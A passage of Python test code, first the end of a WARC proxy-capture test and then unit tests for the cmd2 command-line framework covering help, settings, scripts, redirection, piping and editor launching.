res = requests.get("https://example.com/bar", proxies=self.proxies, verify=False)
ai = ArchiveIterator(warc_writer.get_stream())
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/test'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/foo'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/bar"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/bar'
request = next(ai)
assert request.rec_type == 'request'
with raises(StopIteration):
assert next(ai)
def test_capture_https_proxy_same_session(self):
sesh = requests.session()
with capture_http() as warc_writer:
res = sesh.get("https://example.com/test", proxies=self.proxies, verify=False)
res = sesh.get("https://example.com/foo", proxies=self.proxies, verify=False)
# *will* be captured, as part of same session... (fix this?)
res = sesh.get("https://example.com/skip", proxies=self.proxies, verify=False)
with capture_http(warc_writer):
res = sesh.get("https://example.com/bar", proxies=self.proxies, verify=False)
ai = ArchiveIterator(warc_writer.get_stream())
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/test'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/test"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/foo'
request = next(ai)
assert request.rec_type == 'request'
assert request.rec_headers['WARC-Target-URI'] == "https://example.com/foo"
assert request.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/skip"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/skip'
request = next(ai)
assert request.rec_type == 'request'
response = next(ai)
assert response.rec_type == 'response'
assert response.rec_headers['WARC-Target-URI'] == "https://example.com/bar"
assert response.rec_headers['WARC-Proxy-Host'] == 'https://localhost:{0}'.format(self.port)
assert response.content_stream().read().decode('utf-8') == 'Proxied: /https://example.com/bar'
request = next(ai)
assert request.rec_type == 'request'
with raises(StopIteration):
assert next(ai)
|
test_cmd2.py
|
# coding=utf-8
# flake8: noqa E302
"""
Cmd2 unit/functional testing
"""
import argparse
import builtins
import io
import os
import sys
import tempfile
from code import InteractiveConsole
import pytest
# Python 3.5 had some regressions in the unitest.mock module, so use 3rd party mock if available
try:
import mock
except ImportError:
from unittest import mock
import cmd2
from cmd2 import ansi, clipboard, constants, plugin, utils, COMMAND_NAME
from .conftest import run_cmd, normalize, verify_help_text, HELP_HISTORY
from .conftest import SHORTCUTS_TXT, SHOW_TXT, SHOW_LONG, complete_tester
def CreateOutsimApp():
c = cmd2.Cmd()
c.stdout = utils.StdSim(c.stdout)
return c
@pytest.fixture
def outsim_app():
return CreateOutsimApp()
def test_version(base_app):
assert cmd2.__version__
def test_not_in_main_thread(base_app, capsys):
import threading
cli_thread = threading.Thread(name='cli_thread', target=base_app.cmdloop)
cli_thread.start()
cli_thread.join()
out, err = capsys.readouterr()
assert "cmdloop must be run in the main thread" in err
def test_empty_statement(base_app):
out, err = run_cmd(base_app, '')
expected = normalize('')
assert out == expected
def test_base_help(base_app):
out, err = run_cmd(base_app, 'help')
verify_help_text(base_app, out)
def test_base_help_verbose(base_app):
out, err = run_cmd(base_app, 'help -v')
verify_help_text(base_app, out)
# Make sure :param type lines are filtered out of help summary
help_doc = base_app.do_help.__func__.__doc__
help_doc += "\n:param fake param"
base_app.do_help.__func__.__doc__ = help_doc
out, err = run_cmd(base_app, 'help --verbose')
verify_help_text(base_app, out)
assert ':param' not in ''.join(out)
def test_base_argparse_help(base_app):
# Verify that "set -h" gives the same output as "help set" and that it starts in a way that makes sense
out1, err1 = run_cmd(base_app, 'set -h')
out2, err2 = run_cmd(base_app, 'help set')
assert out1 == out2
assert out1[0].startswith('Usage: set')
assert out1[1] == ''
assert out1[2].startswith('Set a settable parameter')
def test_base_invalid_option(base_app):
out, err = run_cmd(base_app, 'set -z')
assert err[0] == 'Usage: set [-h] [-a] [-l] [param] [value]'
assert 'Error: unrecognized arguments: -z' in err[1]
def test_base_shortcuts(base_app):
out, err = run_cmd(base_app, 'shortcuts')
expected = normalize(SHORTCUTS_TXT)
assert out == expected
def test_command_starts_with_shortcut():
with pytest.raises(ValueError) as excinfo:
app = cmd2.Cmd(shortcuts={'help': 'fake'})
assert "Invalid command name 'help'" in str(excinfo.value)
def test_base_show(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set')
expected = normalize(SHOW_TXT)
assert out == expected
def test_base_show_long(base_app):
# force editor to be 'vim' so test is repeatable across platforms
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set -l')
expected = normalize(SHOW_LONG)
assert out == expected
def test_base_show_readonly(base_app):
base_app.editor = 'vim'
out, err = run_cmd(base_app, 'set -a')
expected = normalize(SHOW_TXT + '\nRead only settings:' + """
Commands may be terminated with: {}
Output redirection and pipes allowed: {}
""".format(base_app.statement_parser.terminators, base_app.allow_redirection))
assert out == expected
def test_cast():
# Boolean
assert utils.cast(True, True) == True
assert utils.cast(True, False) == False
assert utils.cast(True, 0) == False
assert utils.cast(True, 1) == True
assert utils.cast(True, 'on') == True
assert utils.cast(True, 'off') == False
assert utils.cast(True, 'ON') == True
assert utils.cast(True, 'OFF') == False
assert utils.cast(True, 'y') == True
assert utils.cast(True, 'n') == False
assert utils.cast(True, 't') == True
assert utils.cast(True, 'f') == False
# Non-boolean same type
assert utils.cast(1, 5) == 5
assert utils.cast(3.4, 2.7) == 2.7
assert utils.cast('foo', 'bar') == 'bar'
assert utils.cast([1,2], [3,4]) == [3,4]
def test_cast_problems(capsys):
expected = 'Problem setting parameter (now {}) to {}; incorrect type?\n'
# Boolean current, with new value not convertible to bool
current = True
new = [True, True]
assert utils.cast(current, new) == current
out, err = capsys.readouterr()
assert out == expected.format(current, new)
# Non-boolean current, with new value not convertible to current type
current = 1
new = 'octopus'
assert utils.cast(current, new) == current
out, err = capsys.readouterr()
assert out == expected.format(current, new)
def test_base_set(base_app):
out, err = run_cmd(base_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
""")
assert out == expected
out, err = run_cmd(base_app, 'set quiet')
assert out == ['quiet: True']
def test_set_not_supported(base_app):
out, err = run_cmd(base_app, 'set qqq True')
expected = normalize("""
Parameter 'qqq' not supported (type 'set' for list of parameters).
""")
assert err == expected
def test_set_quiet(base_app):
out, err = run_cmd(base_app, 'set quie True')
expected = normalize("""
quiet - was: False
now: True
""")
assert out == expected
out, err = run_cmd(base_app, 'set quiet')
assert out == ['quiet: True']
@pytest.mark.parametrize('new_val, is_valid, expected', [
(ansi.ANSI_NEVER, False, ansi.ANSI_NEVER),
('neVeR', False, ansi.ANSI_NEVER),
(ansi.ANSI_TERMINAL, False, ansi.ANSI_TERMINAL),
('TeRMInal', False, ansi.ANSI_TERMINAL),
(ansi.ANSI_ALWAYS, False, ansi.ANSI_ALWAYS),
('AlWaYs', False, ansi.ANSI_ALWAYS),
('invalid', True, ansi.ANSI_TERMINAL),
])
def test_set_allow_ansi(base_app, new_val, is_valid, expected):
# Initialize allow_ansi for this test
ansi.allow_ansi = ansi.ANSI_TERMINAL
# Use the set command to alter it
out, err = run_cmd(base_app, 'set allow_ansi {}'.format(new_val))
# Verify the results
assert bool(err) == is_valid
assert ansi.allow_ansi == expected
# Reload ansi module to reset allow_ansi to its default since it's an
# application-wide setting that can affect other unit tests.
import importlib
importlib.reload(ansi)
class OnChangeHookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _onchange_quiet(self, old, new) -> None:
"""Runs when quiet is changed via set command"""
self.poutput("You changed quiet")
@pytest.fixture
def onchange_app():
app = OnChangeHookApp()
return app
def test_set_onchange_hook(onchange_app):
out, err = run_cmd(onchange_app, 'set quiet True')
expected = normalize("""
quiet - was: False
now: True
You changed quiet
""")
assert out == expected
def test_base_shell(base_app, monkeypatch):
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, 'shell echo a')
assert out == []
assert m.called
def test_base_py(base_app):
# Create a variable and make sure we can see it
out, err = run_cmd(base_app, 'py qqq=3')
assert not out
out, err = run_cmd(base_app, 'py print(qqq)')
assert out[0].rstrip() == '3'
# Add a more complex statement
out, err = run_cmd(base_app, 'py print("spaces" + " in this " + "command")')
assert out[0].rstrip() == 'spaces in this command'
# Set locals_in_py to True and make sure we see self
out, err = run_cmd(base_app, 'set locals_in_py True')
assert 'now: True' in out
out, err = run_cmd(base_app, 'py print(self)')
assert 'cmd2.cmd2.Cmd object' in out[0]
# Set locals_in_py to False and make sure we can't see self
out, err = run_cmd(base_app, 'set locals_in_py False')
assert 'now: False' in out
out, err = run_cmd(base_app, 'py print(self)')
assert "NameError: name 'self' is not defined" in err
def test_base_error(base_app):
out, err = run_cmd(base_app, 'meow')
assert "is not a recognized command" in err[0]
def test_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_with_empty_args(base_app):
out, err = run_cmd(base_app, 'run_script')
assert "the following arguments are required" in err[1]
def test_run_script_with_nonexistent_file(base_app, capsys):
out, err = run_cmd(base_app, 'run_script does_not_exist.txt')
assert "does not exist" in err[0]
def test_run_script_with_directory(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
out, err = run_cmd(base_app, 'run_script {}'.format(test_dir))
assert "is not a file" in err[0]
def test_run_script_with_empty_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'empty.txt')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert not out and not err
def test_run_script_with_binary_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'binary.bin')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "is not an ASCII or UTF-8 encoded text file" in err[0]
def test_run_script_with_python_file(base_app, request):
m = mock.MagicMock(name='input', return_value='2')
builtins.input = m
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'pyscript', 'stop.py')
out, err = run_cmd(base_app, 'run_script {}'.format(filename))
assert "appears to be a Python file" in err[0]
def test_run_script_with_utf8_file(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'utf8.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_run_script_nested_run_scripts(base_app, request):
# Verify that running a script with nested run_script commands works correctly,
# and runs the nested script commands in the correct order.
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'scripts', 'nested.txt')
# Run the top level script
initial_run = 'run_script ' + filename
run_cmd(base_app, initial_run)
# Check that the right commands were executed.
expected = """
%s
_relative_run_script precmds.txt
set allow_ansi Always
help
shortcuts
_relative_run_script postcmds.txt
set allow_ansi Never""" % initial_run
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_runcmds_plus_hooks(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
prefilepath = os.path.join(test_dir, 'scripts', 'precmds.txt')
postfilepath = os.path.join(test_dir, 'scripts', 'postcmds.txt')
base_app.runcmds_plus_hooks(['run_script ' + prefilepath,
'help',
'shortcuts',
'run_script ' + postfilepath])
expected = """
run_script %s
set allow_ansi Always
help
shortcuts
run_script %s
set allow_ansi Never""" % (prefilepath, postfilepath)
out, err = run_cmd(base_app, 'history -s')
assert out == normalize(expected)
def test_relative_run_script(base_app, request):
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Get output out the script
script_out, script_err = run_cmd(base_app, 'run_script {}'.format(filename))
assert base_app._script_dir == []
assert base_app._current_script_dir is None
# Now run the commands manually and compare their output to script's
with open(filename, encoding='utf-8') as file:
script_commands = file.read().splitlines()
manual_out = []
manual_err = []
for cmdline in script_commands:
out, err = run_cmd(base_app, cmdline)
manual_out.extend(out)
manual_err.extend(err)
assert script_out == manual_out
assert script_err == manual_err
def test_relative_run_script_with_odd_file_names(base_app, monkeypatch):
"""Test file names with various patterns"""
# Mock out the do_run_script call to see what args are passed to it
run_script_mock = mock.MagicMock(name='do_run_script')
monkeypatch.setattr("cmd2.Cmd.do_run_script", run_script_mock)
file_name = utils.quote_string('nothingweird.txt')
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('"nothingweird.txt"')
run_script_mock.reset_mock()
file_name = utils.quote_string('has spaces.txt')
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('"has spaces.txt"')
run_script_mock.reset_mock()
file_name = utils.quote_string('"is_double_quoted.txt"')
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('\'"is_double_quoted.txt"\'')
run_script_mock.reset_mock()
file_name = utils.quote_string("'is_single_quoted.txt'")
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('"\'is_single_quoted.txt\'"')
run_script_mock.reset_mock()
def test_relative_run_script_requires_an_argument(base_app):
out, err = run_cmd(base_app, '_relative_run_script')
assert 'Error: the following arguments' in err[1]
def test_in_script(request):
class HookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.register_cmdfinalization_hook(self.hook)
def hook(self: cmd2.Cmd, data: plugin.CommandFinalizationData) -> plugin.CommandFinalizationData:
if self.in_script():
self.poutput("WE ARE IN SCRIPT")
return data
hook_app = HookApp()
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
out, err = run_cmd(hook_app, 'run_script {}'.format(filename))
assert "WE ARE IN SCRIPT" in out[-1]
def test_output_redirection(base_app):
fd, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(fd)
try:
# Verify that writing to a file works
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with open(filename) as f:
appended_content = f.read()
assert appended_content.startswith(content)
assert len(appended_content) > len(content)
except Exception:
raise
finally:
os.remove(filename)
def test_output_redirection_to_nonexistent_directory(base_app):
filename = '~/fakedir/this_does_not_exist.txt'
# Verify that writing to a file in a non-existent directory doesn't work
run_cmd(base_app, 'help > {}'.format(filename))
with pytest.raises(FileNotFoundError):
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with pytest.raises(FileNotFoundError):
with open(filename) as f:
appended_content = f.read()
verify_help_text(base_app, appended_content)
assert len(appended_content) > len(content)
def test_output_redirection_to_too_long_filename(base_app):
filename = '~/sdkfhksdjfhkjdshfkjsdhfkjsdhfkjdshfkjdshfkjshdfkhdsfkjhewfuihewiufhweiufhiweufhiuewhiuewhfiuwehfia' \
'ewhfiuewhfiuewhfiuewhiuewhfiuewhfiuewfhiuwehewiufhewiuhfiweuhfiuwehfiuewfhiuwehiuewfhiuewhiewuhfiueh' \
'fiuwefhewiuhewiufhewiufhewiufhewiufhewiufhewiufhewiufhewiuhewiufhewiufhewiuheiufhiuewheiwufhewiufheu' \
'fheiufhieuwhfewiuhfeiufhiuewfhiuewheiwuhfiuewhfiuewhfeiuwfhewiufhiuewhiuewhfeiuwhfiuwehfuiwehfiuehie' \
'whfieuwfhieufhiuewhfeiuwfhiuefhueiwhfw'
# Verify that writing to a file in a non-existent directory doesn't work
run_cmd(base_app, 'help > {}'.format(filename))
with pytest.raises(OSError):
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with pytest.raises(OSError):
with open(filename) as f:
appended_content = f.read()
verify_help_text(base_app, content)
assert len(appended_content) > len(content)
def test_feedback_to_output_true(base_app):
base_app.feedback_to_output = True
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(f)
try:
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert content[-1].startswith('Elapsed: ')
except:
raise
finally:
os.remove(filename)
def test_feedback_to_output_false(base_app):
base_app.feedback_to_output = False
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='feedback_to_output', suffix='.txt')
os.close(f)
try:
out, err = run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert not content[-1].startswith('Elapsed: ')
assert err[0].startswith('Elapsed')
except:
raise
finally:
os.remove(filename)
def test_disallow_redirection(base_app):
# Set allow_redirection to False
base_app.allow_redirection = False
filename = 'test_allow_redirect.txt'
# Verify output wasn't redirected
out, err = run_cmd(base_app, 'help > {}'.format(filename))
verify_help_text(base_app, out)
# Verify that no file got created
assert not os.path.exists(filename)
def test_pipe_to_shell(base_app):
if sys.platform == "win32":
# Windows
command = 'help | sort'
else:
# Mac and Linux
# Get help on help and pipe it's output to the input of the word count shell command
command = 'help help | wc'
out, err = run_cmd(base_app, command)
assert out and not err
def test_pipe_to_shell_and_redirect(base_app):
filename = 'out.txt'
if sys.platform == "win32":
# Windows
command = 'help | sort > {}'.format(filename)
else:
# Mac and Linux
# Get help on help and pipe it's output to the input of the word count shell command
command = 'help help | wc > {}'.format(filename)
out, err = run_cmd(base_app, command)
assert not out and not err
assert os.path.exists(filename)
os.remove(filename)
def test_pipe_to_shell_error(base_app):
# Try to pipe command output to a shell command that doesn't exist in order to produce an error
out, err = run_cmd(base_app, 'help | foobarbaz.this_does_not_exist')
assert not out
assert "Pipe process exited with code" in err[0]
@pytest.mark.skipif(not clipboard.can_clip,
reason="Pyperclip could not find a copy/paste mechanism for your system")
def test_send_to_paste_buffer(base_app):
# Test writing to the PasteBuffer/Clipboard
run_cmd(base_app, 'help >')
paste_contents = cmd2.cmd2.get_paste_buffer()
verify_help_text(base_app, paste_contents)
# Test appending to the PasteBuffer/Clipboard
run_cmd(base_app, 'help history >>')
appended_contents = cmd2.cmd2.get_paste_buffer()
assert appended_contents.startswith(paste_contents)
assert len(appended_contents) > len(paste_contents)
def test_base_timing(base_app):
base_app.feedback_to_output = False
out, err = run_cmd(base_app, 'set timing True')
expected = normalize("""timing - was: False
now: True
""")
assert out == expected
if sys.platform == 'win32':
assert err[0].startswith('Elapsed: 0:00:00')
else:
assert err[0].startswith('Elapsed: 0:00:00.0')
def _expected_no_editor_error():
expected_exception = 'OSError'
# If PyPy, expect a different exception than with Python 3
if hasattr(sys, "pypy_translation_info"):
expected_exception = 'EnvironmentError'
expected_text = normalize("""
EXCEPTION of type '{}' occurred with message: 'Please use 'set editor' to specify your text editing program of choice.'
To enable full traceback, run the following command: 'set debug true'
""".format(expected_exception))
return expected_text
def test_base_debug(base_app):
# Purposely set the editor to None
base_app.editor = None
# Make sure we get an exception, but cmd2 handles it
out, err = run_cmd(base_app, 'edit')
expected = _expected_no_editor_error()
assert err == expected
# Set debug true
out, err = run_cmd(base_app, 'set debug True')
expected = normalize("""
debug - was: False
now: True
""")
assert out == expected
# Verify that we now see the exception traceback
out, err = run_cmd(base_app, 'edit')
assert err[0].startswith('Traceback (most recent call last):')
def test_debug_not_settable(base_app):
# Set debug to False and make it unsettable
base_app.debug = False
del base_app.settable['debug']
# Cause an exception
out, err = run_cmd(base_app, 'bad "quote')
# Since debug is unsettable, the user will not be given the option to enable a full traceback
assert err == ['Invalid syntax: No closing quotation']
def test_edit_file(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
run_cmd(base_app, 'edit {}'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
def test_edit_file_with_odd_file_names(base_app, monkeypatch):
"""Test editor and file names with various patterns"""
# Mock out the do_shell call to see what args are passed to it
shell_mock = mock.MagicMock(name='do_shell')
monkeypatch.setattr("cmd2.Cmd.do_shell", shell_mock)
base_app.editor = 'fooedit'
file_name = utils.quote_string('nothingweird.py')
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('"fooedit" "nothingweird.py"')
shell_mock.reset_mock()
base_app.editor = 'foo edit'
file_name = utils.quote_string('has spaces.py')
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('"foo edit" "has spaces.py"')
shell_mock.reset_mock()
base_app.editor = '"fooedit"'
file_name = utils.quote_string('"is_double_quoted.py"')
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('\'"fooedit"\' \'"is_double_quoted.py"\'')
shell_mock.reset_mock()
base_app.editor = "'fooedit'"
file_name = utils.quote_string("'is_single_quoted.py'")
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('"\'fooedit\'" "\'is_single_quoted.py\'"')
shell_mock.reset_mock()
def test_edit_file_with_spaces(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'my commands.txt')
run_cmd(base_app, 'edit "{}"'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
def test_edit_blank(base_app, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
run_cmd(base_app, 'edit')
# We have an editor, so should expect a Popen call
m.assert_called_once()
def test_base_py_interactive(base_app):
# Mock out the InteractiveConsole.interact() call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='interact')
InteractiveConsole.interact = m
run_cmd(base_app, "py")
# Make sure our mock was called once and only once
m.assert_called_once()
def test_base_cmdloop_with_startup_commands():
intro = 'Hello World, this is an intro ...'
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog", 'quit']
expected = intro + '\n'
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
# Run the command loop with custom intro
app.cmdloop(intro=intro)
out = app.stdout.getvalue()
assert out == expected
def test_base_cmdloop_without_startup_commands():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_cmdloop_without_rawinput():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = False
app.echo = False
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
with pytest.raises(OSError):
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="stty sane only run on Linux/Mac")
def test_stty_sane(base_app, monkeypatch):
"""Make sure stty sane is run on Linux/Mac after each command if stdin is a terminal"""
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
# Mock out the subprocess.Popen call so we don't actually run stty sane
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
base_app.onecmd_plus_hooks('help')
m.assert_called_once_with(['stty', 'sane'])
class HookFailureApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# register a postparsing hook method
self.register_postparsing_hook(self.postparsing_precmd)
def postparsing_precmd(self, data: cmd2.plugin.PostparsingData) -> cmd2.plugin.PostparsingData:
"""Simulate precmd hook failure."""
data.stop = True
return data
@pytest.fixture
def hook_failure():
app = HookFailureApp()
return app
def test_precmd_hook_success(base_app):
out = base_app.onecmd_plus_hooks('help')
assert out is False
def test_precmd_hook_failure(hook_failure):
out = hook_failure.onecmd_plus_hooks('help')
assert out is True
class SayApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_say(self, arg):
self.poutput(arg)
@pytest.fixture
def say_app():
app = SayApp(allow_cli_args=False)
app.stdout = utils.StdSim(app.stdout)
return app
def test_interrupt_quit(say_app):
say_app.quit_on_sigint = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n'
def test_interrupt_noquit(say_app):
say_app.quit_on_sigint = False
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n^C\ngoodbye\n'
class ShellApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.default_to_shell = True
def test_default_to_shell(base_app, monkeypatch):
if sys.platform.startswith('win'):
line = 'dir'
else:
line = 'ls'
base_app.default_to_shell = True
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, line)
assert out == []
assert m.called
def test_ansi_prompt_not_esacped(base_app):
from cmd2.rl_utils import rl_make_safe_prompt
prompt = '(Cmd) '
assert rl_make_safe_prompt(prompt) == prompt
def test_ansi_prompt_escaped():
from cmd2.rl_utils import rl_make_safe_prompt
app = cmd2.Cmd()
color = 'cyan'
prompt = 'InColor'
color_prompt = ansi.style(prompt, fg=color)
readline_hack_start = "\x01"
readline_hack_end = "\x02"
readline_safe_prompt = rl_make_safe_prompt(color_prompt)
assert prompt != color_prompt
if sys.platform.startswith('win'):
# PyReadline on Windows doesn't suffer from the GNU readline bug which requires the hack
assert readline_safe_prompt.startswith(ansi.fg_lookup(color))
assert readline_safe_prompt.endswith(ansi.FG_RESET)
else:
assert readline_safe_prompt.startswith(readline_hack_start + ansi.fg_lookup(color) + readline_hack_end)
assert readline_safe_prompt.endswith(readline_hack_start + ansi.FG_RESET + readline_hack_end)
class HelpApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
